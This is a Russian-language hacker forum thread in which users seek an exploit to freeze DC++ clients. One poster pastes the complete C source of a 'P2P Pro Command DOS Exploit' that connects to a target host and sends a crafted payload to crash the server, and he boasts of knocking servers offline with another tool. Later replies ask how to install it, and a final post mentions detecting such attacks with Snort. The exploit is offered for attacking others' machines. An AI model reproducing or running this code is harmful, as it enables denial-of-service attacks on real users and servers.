Зависон в DC++
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
Зависон в DC++ - 2006-09-23 23:10:13.040000
|
|
|
wouper
Сообщений: 5
Оценки: 0
Присоединился: 2006-09-23 23:07:24.290000
|
Доброго времени суток.Вчера видел чела с эксплойтом,который напрочь вешает клиент dc++.Кто нить знает что это за зверь и где взять этот эксплойт?
|
|
|
|
|
RE: Зависон в DC++ - 2006-09-26 18:52:52.006666
|
|
|
*][akep
Сообщений: 144
Оценки: 0
Присоединился: 2006-08-24 17:36:15
|
Интересная тема :D
Вот я нашол сплоит для P2p DC++ но он не отрубает сервак а делает что то другое что я уже непомнь, сам еще неиспытовал.
А отрубал он может не хаб а сервак Сплоитом "EVILGMP" я сам им серваки отрубал от сети.
Вот сплоит для ДС++:
quote:
Exploit:
/*
P2P Pro Command DOS Exploit
————————————
Infam0us Gr0up - Securiti Research
Info: infamous.2hell.com
Vendor URL: http://www.digital-revolution.org/P2PPro.html
*/
#include <string.h>
#include <winsock2.h>
#include <stdio.h>
#pragma comment(lib, "ws2_32.lib")
char doscore[] =
"\x3f\x3f\xbc\x59\x70 "
"\x32\x70\x3f\xe1 "
"\x2b\x5c\x3f\xa6\xeb\xa6"
"\x50\x46\x2b\x5c\x3f\xa6\xeb\xa6"
"\x50\x4f\x57\x4e\x45\x44\x2e\x74"
"\x78\x74\x2b\x5c\x3f\xa6\xeb\xa6"
"\x50\x31\x32\x33\x32\x34\x32\x2e\x6b\x62";
int main(int argc, char *argv[])
{
WSADATA wsaData;
WORD wVersionRequested;
struct hostent *pTarget;
struct sockaddr_in sock;
char *target;
int port,bufsize;
SOCKET inetdos;
if (argc < 2)
{
printf(" P2P Pro Command DOS Exploit \n", argv[0]);
printf(" ————————————–\n", argv[0]);
printf(" Infam0us Gr0up - Securiti Research\n\n", argv[0]);
printf("[-]Usage: %s [target] [port]\n", argv[0]);
printf("[?]Exam: %s localhost 7802\n", argv[0]);
exit(1);
}
wVersionRequested = MAKEWORD(1, 1);
if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1;
target = argv[1];
port = 7802;
if (argc >= 3) port = atoi(argv[2]);
bufsize = 1024;
if (argc >= 4) bufsize = atoi(argv[3]);
inetdos = socket(AF_INET, SOCK_STREAM, 0);
if(inetdos==INVALID_SOCKET)
{
printf("Socket ERROR \n");
exit(1);
}
printf(" P2P Pro Command DOS Exploit \n", argv[0]);
printf(" ————————————–\r\n\n", argv[0]);
printf("Resolve host… ");
if ((pTarget = gethostbyname(target)) == NULL)
{
printf("FAILED \n", argv[0]);
exit(1);
}
printf("[OK]\n ");
memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
sock.sin_family = AF_INET;
sock.sin_port = htons((USHORT)port);
printf("[+] Connecting… ");
if ( (connect(inetdos, (struct sockaddr *)&sock, sizeof (sock) )))
{
printf("FAILED\n");
exit(1);
}
printf("[OK]\n");
printf("Target listen.. \n");
printf("Sending bad procedure… ");
if (send(inetdos, doscore, sizeof(doscore)-1, 0) == -1)
{
printf("ERROR\n");
closesocket(inetdos);
exit(1);
}
printf("[OK]\n ");
printf("[+] Server SHUTDOWNED!\n");
closesocket(inetdos);
WSACleanup();
return 0;
}
|
|
|
|
|
RE: Зависон в DC++ - 2006-09-29 08:38:35.433333
|
|
|
wouper
Сообщений: 5
Оценки: 0
Присоединился: 2006-09-23 23:07:24.290000
|
Да нет,тот чел может повесить конкретного юзера.Именно юзера,а не сервак.Насколько я понял делается это переполнением буфера через приватные сообщения.Терь бы найти этот сплойтик где-нить….
|
|
|
|
|
RE: Зависон в DC++ - 2007-12-05 12:52:39.746666
|
|
|
Record
Сообщений: 19
Оценки: 0
Присоединился: 2007-12-04 23:41:22.870000
|
Как устанавливать этот эксплоит который вешает сервак? обьясните пожалуйста
|
|
|
|
|
RE: Зависон в DC++ - 2007-12-06 03:13:16.280000
|
|
|
BigIron
Сообщений: 898
Оценки: 0
Присоединился: 2007-05-13 18:53:43.593333
|
ДОбавлю несколько не по теме - но подумать думаю стоит многим.
Вобщем против вот таких вот и других сплоитов очень удобно использовать snort.
Даже толком писать-то ничего не надо, пишем динамическое правило с содержанием сплоита в потоке -
и как результат аттака успешно отражается. А в логах - видим во первых сессию, во вторых адреса айпи/мак, интерфейс!!!
А вот если еще поверх и обработчик какой стоит - можно и первоцель отследить - тоесть есть возможность автоматически исследовать путь аттаковавшего - не каждый успеет вручную обрубить хвосты! А автоматом мало кто пользуется….
|
|
|
|
|
|
